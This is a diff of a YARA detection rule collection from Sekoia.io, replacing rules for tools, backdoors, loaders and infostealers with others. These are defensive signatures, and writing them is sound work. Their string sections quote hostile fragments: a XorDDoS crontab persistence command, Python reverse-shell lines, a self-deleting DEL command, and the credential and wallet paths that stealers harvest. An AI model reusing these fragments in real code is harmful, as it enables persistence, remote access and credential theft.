-		$s6 = "under process" ascii wide
-
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 4MB and all of them
+		uint16be( 0 ) == 0x4d5a and ( hash.md5 ( pe.rich_signature.clear_data ) == "2fe65623e6b22577516a4cd051ec3baa" or pe.imphash ( ) == "a5accd1a0d3eaf2c131bc662dd7ff8ea" )
 }
-rule SEKOIA_Tool_Paexec_Strings : FILE
+rule SEKOIA_Bot_Lin_Xorddos_Strings : FILE
 {
 	meta:
-		description = "Detects PAExec based on strings"
+		description = "Catch XORDDoS strings"
 		author = "Sekoia.io"
-		id = "c48b897c-0d88-4fa9-b64b-0e14a38a62d7"
-		date = "2022-09-23"
+		id = "2f5c70a3-fe3f-4091-905d-d779bd0cb2cd"
+		date = "2023-11-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_paexec_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_xorddos_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9c3bae822fd317bdc89c07542b05f6255d6af214071194570500eb2a12924ff6"
+		logic_hash = "b91cfeeaddffe98ac1649c5d88a2091cf7ab8ff65b232f09c323d23684cb2a2d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245076,26 +244922,25 @@ rule SEKOIA_Tool_Paexec_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\\\%s\\%s\\PAExec_Move%u.dat" wide
-		$ = "PAExec_Move%u.dat" wide
-		$ = "Usage: PAExec [\\\\computer[,computer2[,...]]" wide
-		$ = "PAExec returning exit code %d" wide
+		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" ascii fullword
+		$s2 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" ascii fullword
+		$s3 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 500KB
+		uint32( 0 ) == 0x464c457f and filesize > 600KB and filesize < 700KB and 3 of them
 }
-rule SEKOIA_Apt_Ta410_Driver_Keylogger : FILE
+rule SEKOIA_Hacktool_Ipmipwner_Strings : FILE
 {
 	meta:
-		description = "Keylogger TA410"
+		description = "Detects ipmiPwner script"
 		author = "Sekoia.io"
-		id = "0cba1b3b-b93e-41e3-a7df-afd306e6b519"
-		date = "2022-10-11"
+		id = "2ac736b5-33bb-477f-a98c-57cc2744d251"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ta410_driver_keylogger.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ipmipwner_strings.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5ed152cc068f194cb7bf8c34744f0f1ebd4f621e6ae47f14bab64b18d94af4c5"
+		logic_hash = "122311e1791d018f08f3d5ecdf2e0efe3aa5bb913b2c1ce6a3797e8ceb2676eb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245103,30 +244948,24 @@ rule SEKOIA_Apt_Ta410_Driver_Keylogger : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "namedpipe_keymousespy" ascii wide
-		$ = "[`LCTRL]" ascii wide
-		$ = "[`RCTRL]" ascii wide
-		$ = "[`BREAK]" ascii wide
-		$ = "[`NUMLOCK]" ascii wide
-		$ = "[`L]" ascii wide
-		$ = "[`R]" ascii wide
-		$ = "[`M]" ascii wide
+		$ = "{status} Using the list of users that the {lgcyan}script"
+		$ = "--host 192.168.1.12 -p 624 -uW /opt/SecLists/Usernames/"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		all of them and filesize < 10KB
 }
-rule SEKOIA_Exploit_Linux_Eop_Pwnkit_Strings : FILE
+rule SEKOIA_Generic_Python_Reverse_Shell : FILE
 {
 	meta:
-		description = "Detects Pwnkit Local Privesc exploit"
+		description = "Detects simple reverse shell written in Python"
 		author = "Sekoia.io"
-		id = "8637c602-62da-4983-bcb7-ba546fb2ed82"
+		id = "ab25f8db-e39d-4aa4-b431-cf5cd2e038e5"
 		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_pwnkit_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_python_reverse_shell.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9805cc7a6022f7a3372df5d74cef68c6fd0e51072154c82212415846f3603667"
+		logic_hash = "ced9923ef8018796545d93d9ac8ba3138dd7d4e79db742eb3babcd94c8d3c304"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245134,106 +244973,85 @@ rule SEKOIA_Exploit_Linux_Eop_Pwnkit_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "CHARSET=PWNKIT"
-		$ = "i/do/not/exists"
-		$ = "pwnkit/pwnkit.c"
-		$ = "/usr/bin/pkexec"
-		$ = "SHELL=pwnkit"
-		$ = "pwnkit.so"
-		$ = "./pwnkit/"
+		$ = "import pty"
+		$ = "lhost ="
+		$ = "os.dup2(s.fileno(),0)"
+		$ = "os.putenv(\"HISTFILE\",'/dev/null')"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 2 of them
+		filesize < 1KB and all of them
 }
-rule SEKOIA_Infostealer_Win_Lighting : FILE
+rule SEKOIA_Apt_Emissarypanda_Web_Auto_Attack_Tool : FILE
 {
 	meta:
-		description = "Detect the Lighting infostealer based on specific strings"
+		description = "Detect LuckyMouse's Web auto attack tool"
 		author = "Sekoia.io"
-		id = "3c160c16-f417-4fa2-aa44-fb7b981fb2b3"
-		date = "2022-04-07"
+		id = "c93eb792-a443-4c9a-8fcb-6015cc69f9b3"
+		date = "2022-08-03"
 		modified = "2024-12-19"
-		reference = "https://blog.cyble.com/2022/04/05/inside-lightning-stealer/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_lighting.yar#L1-L40"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_emissarypanda_web_auto_attack_tool.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1c1d39ce886a433a352c55bf436b959ef528ad7ce38027243ed5b5f1ac79822f"
+		logic_hash = "bc55758367ba0a6b5cf963bcb51b7770b2c7b1cf43b0b79e663b4110f6a7bba8"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "\\logins.json" wide
-		$str1 = "key3.db" wide
-		$str2 = "\\key4.db" wide
-		$str3 = "cert9.db" wide
-		$str4 = "\\places.sqlite" wide
-		$str5 = "7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9" ascii
-		$str6 = "potentiallyVulnerablePasswords" wide
-		$dll0 = "\\mozglue.dll" wide
-		$dll1 = "\\nss3.dll" wide
-		$dll2 = "SbieDll.dll" wide
-		$app00 = "\\discord\\Local Storage\\leveldb\\" wide
-		$app01 = "Software\\Valve\\Steam" wide
-		$app02 = "Telegram Desktop\\tdata" wide
-		$app03 = "\\Wallets\\Armory\\" wide
-		$app04 = "\\Wallets\\Atomic\\Local Storage\\leveldb\\" wide
-		$app05 = "\\Exodus\\exodus.wallet\\" wide
-		$app06 = "\\Wallets\\Zcash\\" wide
-		$app07 = "uCozMedia\\Uran" wide
-		$app08 = "Comodo\\IceDragon" wide
-		$app09 = "8pecxstudios\\Cyberfox" wide
-		$app10 = "NETGATE Technologies\\BlackHaw" wide
-		$app11 = "Moonchild Productions\\Pale Moon" wide
+		$ = "[192.168.1.1/24|192.168.1.1|192.168.1|@host.txt]" ascii
+		$ = "80,s443,8080,s8443,8000-8010" ascii
+		$ = "exploit When find module vul" ascii
+		$ = "<title>\\s*(.*?)\\s*</title>" ascii
+		$ = "<meta.+?charset=[^\\w]?([-\\w]+)" ascii
+		$ = "%s is not existed" ascii
+		$ = "%-15s %4d Open" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of ( $str* ) and all of ( $dll* ) and 10 of ( $app* )
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
 }
-rule SEKOIA_Tool_Enum4Linux_Strings
+rule SEKOIA_Merlin_Crossplatform : FILE
 {
 	meta:
-		description = "Detects enum4linux based on strings"
+		description = "Detects Merlin agent cross platform"
 		author = "Sekoia.io"
-		id = "6b3094fe-1292-4da3-a1ed-9e255be531da"
-		date = "2024-02-02"
+		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be6"
+		date = "2022-01-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_enum4linux_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/merlin_crossplatform.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d3f7ddbdfb679b34777298aec84464d55fac7600b855526a7f13d8c8f17ab888"
+		logic_hash = "975cc4fe0d89383188f9fd3c516d1e853dd6070d7703c0b5b5874dc1e7e6f32a"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "my $os_info = `$command`;"
-		$ = "($global_workgroup) = $os_info =~"
-		$ = "sub enum_groups {"
-		$ = "if ($shares =~ /NT_STATUS_ACCESS_DENIED/) {"
-		$ = "Can't open share list file $shares_file"
-		$ = "my $users = `$command`;"
-		$ = "my @shares = <SHARES>;"
-		$ = "foreach my $grouptype (\"builtin\", \"domain\") {"
+		$s1 = ".CRT" ascii
+		$s2 = ".tls" ascii
+		$s3 = "github.com/Ne0nd0g/merlin" ascii
+		$s4 = "github.com/refraction-networking" ascii
+		$s5 = "SendMerlinMessage" ascii
+		$s6 = "ifconfigH9" ascii
 
 	condition:
-		6 of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and all of them and filesize > 5MB and filesize < 15MB
 }
-
-rule SEKOIA_Loader_Win_Svcready_Imports : FILE
+rule SEKOIA_Downloader_Mac_Smooth_Operator : FILE
 {
 	meta:
-		description = "Finds samples of the SVCReady loader"
+		description = "Detect the Smooth_Operator malware"
 		author = "Sekoia.io"
-		id = "e89aa736-acee-4881-b367-a9abfe9784ec"
-		date = "2022-06-08"
+		id = "c132b3f0-f536-4a66-bcf8-2a95c258c414"
+		date = "2023-07-04"
 		modified = "2024-12-19"
-		reference = "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_svcready_imports.yar#L3-L25"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_mac_smooth_operator.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f210c5363d19dbc822b8476f8ecfd86184af8f1c36819a6c868f171152e7cb74"
+		logic_hash = "031f766d6ab7d94ed7ba4324d4bdfa3fbc11986fba35487a88a1ee3aba090c82"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245241,55 +245059,57 @@ rule SEKOIA_Loader_Win_Svcready_Imports : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "Svc:RunPEDllNative" ascii
-		$str1 = "RunPEDllNative::" ascii
+		$ = "%s/.main_storage"
+		$ = "%s/UpdateAgent"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 200KB and filesize < 2MB and pe.imports ( "GDI32.dll" , "Ellipse" ) and pe.imports ( "GDI32.dll" , "SelectObject" ) and pe.imports ( "GDI32.dll" , "GetStockObject" ) and pe.imports ( "GDI32.dll" ) == 3 and all of them
+		uint32be( 0 ) == 0xcafebabe and all of them
 }
-rule SEKOIA_Hacktool_Gtunnel_Strings : FILE
+rule SEKOIA_Apt_Lazarus_Pondrat : FILE
 {
 	meta:
-		description = "Detects Go gTunnel based on strings"
+		description = "Detects PondRAT via mangled command names"
 		author = "Sekoia.io"
-		id = "f20a4400-8ae6-4954-b643-0a8847f037f0"
-		date = "2023-04-24"
+		id = "a957c158-a79a-4d7a-8473-b6960cf02d9b"
+		date = "2024-09-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_gtunnel_strings.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_pondrat.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "76a67f0487fea7b890863bef06a48f665b611f7659eb374cd83cd4be01b812ab"
+		hash = "b62c912de846e743effdf7e5654a7605"
+		hash = "61d7b2c7814971e5323ec67b3a3d7f45"
+		hash = "ce35c935dcc9d55b2c79945bac77dc8e"
+		hash = "f50c83a4147b86cdb20cc1fbae458865"
+		hash = "05957d98a75c04597649295dc846682d"
+		hash = "33c9a47debdb07824c6c51e13740bdfe"
+		logic_hash = "49c5f635e3873a145479bb164838043921d012eef7dc8ad6373c43c8cf1f14e0"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$repo = "github.com/hotnops/gTunnel/" ascii fullword
-		$s1 = "common.(*Tunnel).GetControlStream"
-		$s2 = "common.(*Tunnel).handleIngressCtrlMessages"
-		$s3 = "client..inittask"
-		$s4 = "client.file_client_proto_rawDescGZIP."
-		$s5 = "common.(*SocksServer).Start."
-		$s6 = "client.(*TunnelControlMessage).GetConnectionId"
-		$s7 = "protobuf/reflect/protoreflect.ProtoMessage"
+		$cmd_PondRAT1 = "_Z7MsgDownP11_TRANS_INFO" ascii
+		$cmd_PondRAT2 = "_Z5MsgUpP11_TRANS_INFO" ascii
+		$cmd_PondRAT3 = "_Z6MsgRunP11_TRANS_INFO" ascii
+		$cmd_PondRAT4 = "_Z6MsgCmdP11_TRANS_INFO" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe ) and #repo > 200 or 5 of ( $s* )
+		3 of them and filesize < 4MB
 }
-rule SEKOIA_Apt_Andariel_Nestdoor_Variants_Strings : FILE
+rule SEKOIA_Tool_Rubeus_Strings : FILE
 {
 	meta:
-		description = "Detects Nestdoor based on (weak) strings"
+		description = "Detects Rubeus"
 		author = "Sekoia.io"
-		id = "dcfc48ad-f17b-4224-912b-b01740080fea"
-		date = "2024-06-17"
+		id = "df1860d0-ec34-4c2d-bd83-5f16b26d075c"
+		date = "2024-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_andariel_nestdoor_variants_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_rubeus_strings.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "bc01138d1fc079c2b778175742e121f10cb47f29cc4eb04d38b4f0f5740f05a4"
+		logic_hash = "adc6a5207bb15c8020ca170564ea9066b2c0b0e09839d6838744c623f59153cf"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245297,54 +245117,65 @@ rule SEKOIA_Apt_Andariel_Nestdoor_Variants_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$v_11 = "Error occurs while reading" wide
-		$v_12 = "{DECIMAL}" wide
-		$v_13 = "lnk_" wide
-		$v_21 = "Cannot connect with your ip and your operating system." wide
-		$v_22 = "del /q /f %1" ascii
-		$v_23 = "/f /tn %2" ascii
+		$ = ".Ndr.RPC_DISPATCH_TABLE32"
+		$ = ".Ndr.RPC_PROTSEQ_ENDPOINT32"
+		$ = ".Ndr.RPC_SERVER_INTERFACE32"
+		$ = ".Ndr.NDR_EXPR_DESC32"
+		$ = "$krb5tgs${0}$*{1}${2}${3}*${4}${5}" wide
+		$ = "$krb5asrep$23${0}@{1}:{2}" wide
+		$ = "Unable to decrypt the EncTicketPart using key:" wide
+		$ = "[*] Target service  : {0:x}" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and ( all of ( $v_1* ) or all of ( $v_2* ) )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
 }
-rule SEKOIA_Hacktool_Microsocks_Strings : FILE
+rule SEKOIA_Apt_Ivanti_Krustyloader : FILE
 {
 	meta:
-		description = "Detects Microsocks"
+		description = "Detects KrustyLoader used in the Ivanti campaign"
 		author = "Sekoia.io"
-		id = "20e82008-249b-47a3-885b-7c4b04b31a57"
-		date = "2023-12-08"
+		id = "617fdd5f-7555-49e8-b0ec-2199f017dc40"
+		date = "2024-01-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_microsocks_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ivanti_krustyloader.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b76b66fbdd9a7e2ea8adb68781d6b14c18189a8b330a61c2a65e7394ef8024c3"
+		logic_hash = "fe982dffcff4bec78593080d7745aeb32bc2e3b7e0df373bbbd53bc6f53cfcbf"
 		score = 75
-		quality = 80
+		quality = 30
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "microsocks -1 -i listenip -p port -u user -P password"
-		$ = "user/pass, it is added to a whitelist"
+		$s1 = "/proc/self/exe" ascii fullword
+		$s2 = "||||||||||||||"
+		$s3 = "/tmp/"
+		$xor = {40 80 f5}
+		$chunk_1 = {
+        66 0F EF D0
+        66 0F 6F C3
+        66 0F 73 F8 0C
+        66 0F EF C1
+        66 0F EF C2
+        66 0F EF C3
+        }
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 2MB and all of them and #xor > 2 and #chunk_1 > 6 and @s3 < @s2 and @s2 < @s3 + 300
 }
-
-rule SEKOIA_Backdoor_Win_Andardoor : FILE
+rule SEKOIA_Apt_Oilrig_Webshell : FILE
 {
 	meta:
-		description = "Detect the Andardoor backdoor used by Andariel"
+		description = "Detects a webshell used by OilRig"
 		author = "Sekoia.io"
-		id = "27f28f6e-b8fd-41dc-88a8-92f5a125a807"
-		date = "2023-09-04"
+		id = "53955117-5176-4682-89ad-1503faba42aa"
+		date = "2024-10-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_andardoor.yar#L4-L34"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_webshell.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "631836634222f4e081d3070c92150a4e14f06bcdd462fbfdf0756aa1f2661b59"
+		logic_hash = "0e0879bafa1becf7e4aef008229a79ab8e0c50eda03232abd5cbb8fc59f482d3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245352,28 +245183,26 @@ rule SEKOIA_Backdoor_Win_Andardoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = " : Deleted Dir" wide
-		$ = " : Not Exists" wide
-		$ = " : Deleted File" wide
-		$ = " : Closed." wide
-		$ = " : Opened." wide
-		$ = "GoodLuck!" wide
+		$ = "string d = com;"
+		$ = "string p = fu;"
+		$ = "#@rt12!@$$$nnMF##"
+		$ = "messi(d)))"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9fea4972270c492ca304f3663913ae63" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "34fde27c3c864efa6225e72016992d341f29cbbea638432a1c63ce05ca568300" )
+		2 of them and filesize < 80KB
 }
-rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment : FILE
+rule SEKOIA_Apt_Andariel_Siennablue : FILE
 {
 	meta:
-		description = "Detects Gamaredon HTMLSmuggling attachment"
+		description = "Detects SiennaBlue based routine names"
 		author = "Sekoia.io"
-		id = "a39b6e67-9327-4c5b-902a-b9853cfefc8e"
-		date = "2023-01-20"
+		id = "ab3f8b49-0851-47a8-ac77-98d4e26f448e"
+		date = "2023-11-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_htmlsmuggling_attachment.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_andariel_siennablue.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e13da493404b27ef0c026ca32accbb30792981e810c099d633f5de225e241b4d"
+		logic_hash = "0876deb2e76098ac8d304737243d3a76e9741b2ca1570034bec51fea5a40818d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245381,52 +245210,68 @@ rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "['at'+'ob'](" ascii
-		$ = "['ev'+'al'](" ascii
-		$ = "document.querySelectorAll('[" ascii
-		$ = "[0].innerHTML.split(' ').join('')))" ascii
+		$ = "main_cryptAVPass"
+		$ = "main_DecryptString"
+		$ = "main_DisableNetworkDevice"
+		$ = "main_DeleteSchTask"
 
 	condition:
-		filesize < 1MB and 2 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 4MB and filesize < 15MB and all of them
 }
-rule SEKOIA_Zip_Win_Abcloader
+rule SEKOIA_Infostealer_Win_Vulturi : FILE
 {
 	meta:
-		description = "Use the CRC32 to detect a zip containing the doc file used to drop and launch ABCloader"
+		description = "Detect the Vulturi infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "0d14b34a-9095-48fa-b616-4e8239f3b547"
-		date = "2024-08-19"
+		id = "5369cbfb-ff94-4484-b5a4-894feeed97e1"
+		date = "2022-03-14"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/zip_win_abcloader.yar#L1-L17"
+		reference = "https://lamp-ret.club/t/vulturi-cracked-by-tr0uble-and-eshelon_mayskih.193/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_vulturi.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "0c7d8e611781b29e15df415640858294"
-		logic_hash = "024d068a86432f35b0f7af0c4cdccb37d0979d01e90f7c9d1ae8a2dddfa3bfc8"
+		logic_hash = "2d442768499ea0d4b6f5ac0d85521d73bb8337a53f1641485b0ce0054e2dc91c"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$crc = {32 56 27 e2}
-		$name = "iden.doc"
+		$vul = "Vulturi_" ascii
+		$str01 = "/C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A" wide
+		$str02 = "SELECT ExecutablePath, ProcessID FROM Win32_Process" wide
+		$str03 = "Apps\\Gaming\\Minecraft" wide
+		$str04 = "Apps\\Gaming\\Steam\\Apps" wide
+		$str05 = "Messengers\\Facebook\\Contacts.txt" wide
+		$str06 = "Messengers\\Discord\\Tokens.txt" wide
+		$str07 = "Apps\\VPN\\NordVPN\\accounts.txt" wide
+		$str08 = "Apps\\VPN\\DUC\\credentials.txt" wide
+		$str09 = "System\\Screenshots\\Webcam.png" wide
+		$str10 = "System\\Screenshots\\Desktop.png" wide
+		$str11 = "GTA San Andreas User Files\\SAMP\\USERDATA.DAT" wide
+		$str12 = "http://ip-api.com/line?fields=query" wide
+		$str13 = "Wireshark" wide
+		$str14 = "KeePass.config.xml" wide
+		$str15 = "Apps\\TheBat!" wide
+		$str16 = "Vulturi" wide
+		$str17 = "StealerStub" wide
 
 	condition:
-		$name at @crc [ 1 ] + 16
+		uint16( 0 ) == 0x5A4D and ( #vul > 50 or 12 of ( $str* ) )
 }
-rule SEKOIA_Apt_Lazarus_Lambload_Timecheck : FILE
+rule SEKOIA_Infostealer_Win_Enigma_Loader_Module : FILE
 {
 	meta:
-		description = "Detects timeCheck routine in LambLoad"
+		description = "Find loader module of Enigma Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "8807c752-c34e-4c3b-9194-3a9bd2575a88"
-		date = "2023-11-27"
+		id = "664fe8de-b406-4d63-9a4b-1c350b444f01"
+		date = "2023-01-30"
 		modified = "2024-12-19"
-		reference = "https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_lambload_timecheck.yar#L1-L67"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_enigma_loader_module.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "019e559f3596cf83f7e7ada05f6550b50b2d45d577600fa549470b98af93e23b"
+		hash = "f1623c2f7c00affa3985cf7b9cdf25e39320700fa9d69f9f9426f03054b4b712"
+		logic_hash = "f5485b14291acc299d66b72aefd2d5e558d82f6a90450d293eb147f05423f2d8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -245434,269 +245279,272 @@ rule SEKOIA_Apt_Lazarus_Lambload_Timecheck : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        0F 85 ?? ?? ?? ??
-        8D 85 ?? ?? ?? ??
-        50
-        E8 ?? ?? ?? ??
-        83 C4 ??
-        83 78 ?? ??
-        0F 85 ?? ?? ?? ??
-        8B 48 ??
-        83 F9 ??
-        0F 8C ?? ?? ?? ??
-        83 F9 ??
-        0F 8D ?? ?? ?? ??
-        8B 40 ??
-        83 F8 ??
-        0F 8C ?? ?? ?? ??
-        83 F8 ??
-        0F 8D ?? ?? ?? ??
-        53
-        57
-        68 ?? ?? ?? ??
